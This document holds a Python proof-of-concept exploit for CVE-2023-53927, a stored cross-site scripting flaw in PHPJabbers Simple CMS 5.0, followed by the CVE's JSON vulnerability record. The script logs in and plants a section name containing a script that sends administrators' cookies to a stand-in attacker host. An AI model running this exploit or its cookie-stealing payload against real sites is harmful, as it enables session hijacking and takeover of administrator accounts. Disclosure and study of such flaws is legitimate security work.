CVE-2023-53927

# CVE-2023-53927 Stored XSS PoC # Target: PHPJabbers Simple CMS 5.0 # Vulnerability: Stored XSS via section name parameter import requests import sys from bs4 import BeautifulSoup TARGET_URL = "http://target.com/phpjabbers-cms" USERNAME = "attacker" PASSWORD = "password" def login(session): """Authenticate with the CMS""" login_url = f"{TARGET_URL}/index.php?controller=pjAdmin&action=pjActionLogin" data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, data=data) return "pj_auth" in session.cookies or response.status_code == 200 def create_malicious_section(session): """Create a section with XSS payload in name""" section_url = f"{TARGET_URL}/index.php?controller=pjSections&action=pjActionCreate" # XSS payload - steals cookies when admin views section xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' data = { "section_name": xss_payload, "section_content": "Malicious section content", "status": 1 } response = session.post(section_url, data=data) return response.status_code == 200 def main(): session = requests.Session() print("[*] Logging into PHPJabbers Simple CMS...") if not login(session): print("[-] Login failed") sys.exit(1) print("[+] Login successful") print("[*] Creating malicious section...") if create_malicious_section(session): print("[+] Malicious section created successfully") print("[*] XSS payload will execute when admin views the section") else: print("[-] Failed to create section") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2023-53927", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:52.027", "lastModified": "2025-12-27T17:15:44.330", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPJabbers Simple CMS 5.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through section name parameters. Attackers can create sections with embedded JavaScript payloads that will execute when administrators view the sections, potentially enabling client-side code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpjabbers:simple_cms:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "BB1F6F0F-FE04-4934-B78A-6C0F5825AF8C"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51415", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.phpjabbers.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/phpjabbers-simple-cms-stored-cross-site-scripting-via-section-creation", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51415", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}